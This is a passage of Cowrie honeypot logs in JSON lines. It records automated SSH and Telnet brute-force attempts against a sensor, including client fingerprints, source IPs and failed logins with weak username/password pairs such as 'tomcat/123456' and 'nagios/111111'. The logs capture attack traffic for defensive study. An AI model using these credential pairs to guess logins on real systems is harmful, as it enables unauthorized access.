-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:46:32.197870Z","src_ip":"212.227.125.160","session":"accc487f1564"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"123123","message":"login attempt [nagios/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:46:32.706520Z","src_ip":"212.227.125.160","session":"accc487f1564"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:46:33.889398Z","src_ip":"212.227.125.160","session":"accc487f1564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49632,"dst_ip":"1.2.3.4","dst_port":22,"session":"dee7d03fbc9f","protocol":"ssh","message":"New connection: 212.227.125.160:49632 (1.2.3.4:22) [session: dee7d03fbc9f]","sensor":"my-vps","timestamp":"2025-08-28T12:47:11.611370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:47:11.612197Z","src_ip":"212.227.125.160","session":"dee7d03fbc9f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:47:11.783653Z","src_ip":"212.227.125.160","session":"dee7d03fbc9f"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"111111","message":"login attempt [nagios/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:47:12.485272Z","src_ip":"212.227.125.160","session":"dee7d03fbc9f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:47:13.659173Z","src_ip":"212.227.125.160","session":"dee7d03fbc9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44102,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e537eb6beee","protocol":"ssh","message":"New connection: 212.227.125.160:44102 (1.2.3.4:22) [session: 5e537eb6beee]","sensor":"my-vps","timestamp":"2025-08-28T12:47:52.539194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:47:52.540126Z","src_ip":"212.227.125.160","session":"5e537eb6beee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:47:52.714070Z","src_ip":"212.227.125.160","session":"5e537eb6beee"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"1234567","message":"login attempt [nagios/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:47:53.241355Z","src_ip":"212.227.125.160","session":"5e537eb6beee"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:47:54.423070Z","src_ip":"212.227.125.160","session":"5e537eb6beee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58356,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fc677d4c0e2","protocol":"ssh","message":"New connection: 212.227.125.160:58356 (1.2.3.4:22) [session: 5fc677d4c0e2]","sensor":"my-vps","timestamp":"2025-08-28T12:48:33.581790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:48:33.582519Z","src_ip":"212.227.125.160","session":"5fc677d4c0e2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:48:33.760232Z","src_ip":"212.227.125.160","session":"5fc677d4c0e2"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:34.296434Z","src_ip":"212.227.125.160","session":"5fc677d4c0e2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:48:35.480302Z","src_ip":"212.227.125.160","session":"5fc677d4c0e2"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":64750,"dst_ip":"1.2.3.4","dst_port":22,"session":"19843fd7f289","protocol":"ssh","message":"New connection: 80.94.95.15:64750 (1.2.3.4:22) [session: 19843fd7f289]","sensor":"my-vps","timestamp":"2025-08-28T12:48:39.113990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:48:39.114771Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:48:39.801525Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.login.failed","username":"user","password":"southern","message":"login attempt [user/southern] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:41.944193Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.login.failed","username":"user","password":"rusty1","message":"login attempt [user/rusty1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:43.041247Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.login.failed","username":"user","password":"punkin","message":"login attempt [user/punkin] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:44.436738Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.login.failed","username":"user","password":"napass","message":"login attempt [user/napass] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:45.504857Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.login.failed","username":"user","password":"marian","message":"login attempt [user/marian] failed","sensor":"my-vps","timestamp":"2025-08-28T12:48:46.602112Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:48:48.023149Z","src_ip":"80.94.95.15","session":"19843fd7f289"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33540,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb35ed680d8e","protocol":"telnet","message":"New connection: 212.227.125.160:33540 (1.2.3.4:23) [session: eb35ed680d8e]","sensor":"my-vps","timestamp":"2025-08-28T12:48:54.256578Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32918,"dst_ip":"1.2.3.4","dst_port":22,"session":"095a90efa94b","protocol":"ssh","message":"New connection: 212.227.125.160:32918 (1.2.3.4:22) [session: 095a90efa94b]","sensor":"my-vps","timestamp":"2025-08-28T12:49:14.083018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:49:14.083678Z","src_ip":"212.227.125.160","session":"095a90efa94b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:49:14.392509Z","src_ip":"212.227.125.160","session":"095a90efa94b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password","message":"login attempt [tomcat/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:49:14.909176Z","src_ip":"212.227.125.160","session":"095a90efa94b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:49:16.084908Z","src_ip":"212.227.125.160","session":"095a90efa94b"}
{"eventid":"cowrie.session.closed","duration":31.491666793823242,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:49:25.748179Z","src_ip":"212.227.125.160","session":"eb35ed680d8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50776,"dst_ip":"1.2.3.4","dst_port":22,"session":"321ad087e5ea","protocol":"ssh","message":"New connection: 212.227.125.160:50776 (1.2.3.4:22) [session: 321ad087e5ea]","sensor":"my-vps","timestamp":"2025-08-28T12:49:54.390143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:49:54.391101Z","src_ip":"212.227.125.160","session":"321ad087e5ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:49:54.555092Z","src_ip":"212.227.125.160","session":"321ad087e5ea"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:49:55.049276Z","src_ip":"212.227.125.160","session":"321ad087e5ea"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:49:56.214710Z","src_ip":"212.227.125.160","session":"321ad087e5ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41730,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b0146ebb27","protocol":"ssh","message":"New connection: 212.227.125.160:41730 (1.2.3.4:22) [session: a2b0146ebb27]","sensor":"my-vps","timestamp":"2025-08-28T12:50:36.561523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:50:36.568286Z","src_ip":"212.227.125.160","session":"a2b0146ebb27"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:50:36.736796Z","src_ip":"212.227.125.160","session":"a2b0146ebb27"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345","message":"login attempt [tomcat/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:50:37.435238Z","src_ip":"212.227.125.160","session":"a2b0146ebb27"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:50:38.660508Z","src_ip":"212.227.125.160","session":"a2b0146ebb27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36282,"dst_ip":"1.2.3.4","dst_port":22,"session":"b163472f5520","protocol":"ssh","message":"New connection: 212.227.235.229:36282 (1.2.3.4:22) [session: b163472f5520]","sensor":"my-vps","timestamp":"2025-08-28T12:50:59.945449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:50:59.946373Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T12:51:00.035105Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","sensor":"my-vps","timestamp":"2025-08-28T12:51:00.213730Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T12:51:00.214650Z","src_ip":"212.227.235.229","session":"b163472f5520"}
